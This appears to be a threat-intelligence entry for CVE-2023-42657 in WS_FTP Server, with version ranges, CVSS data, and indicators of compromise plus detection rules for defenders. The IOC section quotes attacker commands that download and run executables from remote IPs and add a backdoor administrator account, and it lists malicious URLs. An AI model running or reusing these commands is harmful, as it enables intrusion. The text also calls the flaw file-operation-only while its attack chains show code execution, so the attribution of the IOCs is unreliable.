CVE-2023-42657
published 2023-09-27


Priority: P183
Severity: critical, 9.6 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
In the wild: VulnCheck KEV (exploited in the wild)
EPSS: 17.03% (96.7th percentile)
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.

Affected (4 ranges)

Vendor                        | Product        | Version range      | Fixed in
------------------------------|----------------|--------------------|---------
progress                      | ws_ftp_server  | < 8.7.4            | 8.7.4
progress                      | ws_ftp_server  | >= 8.8.0 < 8.8.2   | 8.8.2
progress_software_corporation | ws_ftp_server  | >= 8.7.0 < 8.7.4   | 8.7.4
progress_software_corporation | ws_ftp_server  | >= 8.8.0 < 8.8.2   | 8.8.2

Detection & IOCs (extracted from sources)

ip: 103.163.187.12
url: hxxp://103.163.187.12:8080/3P37p073LKuQjOE64pjEVw
url: hxxp://103.163.187.12:8080/c8e3vG0e3TMiqcjcZOXhhA
url: hxxp://103.163.187.12:8080/cz3eKnhcaD0Fik7Eexo66A
url: hxxp://103.163.187.12:8080/Sw8J6d3NVuvrBiTCXrg4Og
url: hxxp://103.163.187.12:8080/xkJ5de2brMfvCNNnBoRRAg
url: hxxp://141.255.167.250:8081/o1X7qlIaYzSmCj.hta
url: hxxp://176.105.255.46:8080/aqmCG0mZlo_xnZRAWbz6MQ
url: hxxp://176.105.255.46:8080/OFmLqOxFRIkoENjCZsC7OQ
url: hxxp://176.105.255.46:8080/Rn0KQbPo22laaUbKGy30sg
url: hxxp://81.19.135.226:8080/_1TZ--18Hpqm06wvtjLMAg
url: hxxps://filebin.net/soa40iww2w8jhgnd/svchostt.dll
url: hxxps://tmpfiles.org/dl/2669123/client.txt
url: hxxps://tmpfiles.org/dl/2669853/client.txt
url: hxxps://tmpfiles.org/dl/2671793/sl.txt
url: hxxp://34.77.65.112:25565
url: 45.93.138.44/cl.exe
ip: 34.77.65.112
ip: 45.93.138.44
ip: 81.19.135.226
ip: 141.255.167.250
ip: 176.105.255.46
domain: 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com
domain: bgvozb1wnz86q952zxjlwusv2m8gw5.oastify.com
domain: qzt3iqkb6erl9oohic20f9bal1rsfh.oastify.com
hash: 1d41e0783c523954ad12d950c3805762a1218ba6
hash: 1d7b08bf5ca551272066f40d8d55a7c197b2f590
hash: 32548a7ef421e8e838fa31fc13723d44315f1232
hash: 3fe67f2c719696b7d02a3c648803971d4d1fd18c
hash: 40b2d3a6a701423412bb93b7c259180eb1221d68
hash: 65426816ef29c736b79e1969994adf2e74b10ad8
hash: 790dcfb91eb727b04d348e2ed492090d16c6dd3e
hash: 83140ae9951b66fba6da07e04bfbba4e9228cbb8
hash: 83e6ede4c5f1c5e4d5cd12242b3283e9c48eea7e
hash: 8c14a4e7cee861b2fad726fc8dd0e0ae27164890
hash: 8dbca2f55c2728b1a84f93141e0b2a5b87fa7d35
hash: 923fd8fb3ddc1358cc2791ba1931bb4b29580bb6
hash: 98321d034ddc77fe196c6b145f126b0477b32db9
hash: b4a5bf6c9f113165409c35726aec67ff66490787
hash: b70aa1d07138b5cae8dd95feba9189f1238ee158
hash: d00169f5eff9e0f2b5b1d473c0ee4fe9a3d8980e
hash: d669b3977ebebf7611dd2cb1d09c31b3f506e9bd
hash: e5ac227f143ec3f815e475c0b4f4f852565e1e76
hash: f045a41def1752e7f8ef38d4ce1f7bd5e01490fc
filename: xmpp.exe
path: C:\programdata\xmpp.exe
path: C:\programdata\ft.exe
filename: svchostt.dll
command: /c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe
command: /c cmd.exe /C curl 45[.]93[.]138[.]44/cl.exe -o C:/cl.exe
command: -i -c "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"
sigma
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')
  • Exploitation of CVE-2023-42657 spawns child processes from w3wp.exe running under the 'WSFTPSVR_WTM' application pool; hunt for w3wp.exe with cmdline containing 'WSFTPSVR_WTM' spawning certutil, mshta, powershell, pwsh, cmd, curl, wmic, nslookup, ping, or whoami
  • Attack Chain 1 uses certutil with -urlcache flag to download and execute a payload from an IP-literal URL on port 8080 with a 22-character alphanumeric path; monitor certutil.exe spawned by w3wp.exe with -urlcache arguments
  • Attack Chain 2 uses curl to download cl.exe to C:\ root and then executes it directly; monitor for curl spawned by w3wp.exe writing executables to C:\ and subsequent execution of C:/cl.exe
  • Attack Chain 2 also uses OOB DNS callbacks to oastify.com subdomains for exploitation confirmation; monitor DNS queries to *.oastify.com from WS_FTP server processes
  • Attack Chain 3 drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData and creates a local admin account named 'temp' with password 'p@ssw0rd123'; monitor for net user/localgroup commands and new files in C:\ProgramData from w3wp.exe lineage
  • Exploitation began September 30, 2023; only WS_FTP Server versions prior to 8.7.4 and 8.8.2 are vulnerable — patched versions are not affected
  • The vulnerability requires a low-complexity attack with no user interaction per CVSS:3.1 scoring, meaning internet-exposed WS_FTP servers are at high risk of opportunistic scanning and exploitation
  • Upgrading using the full installer is the only remediation path; partial patches are insufficient

CVSS provenance

Source    | Version | Score | Severity | Vector
----------|---------|-------|----------|-------
nvd       | v3.1    | 9.6   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
vulncheck |         | 9.9   | CRITICAL |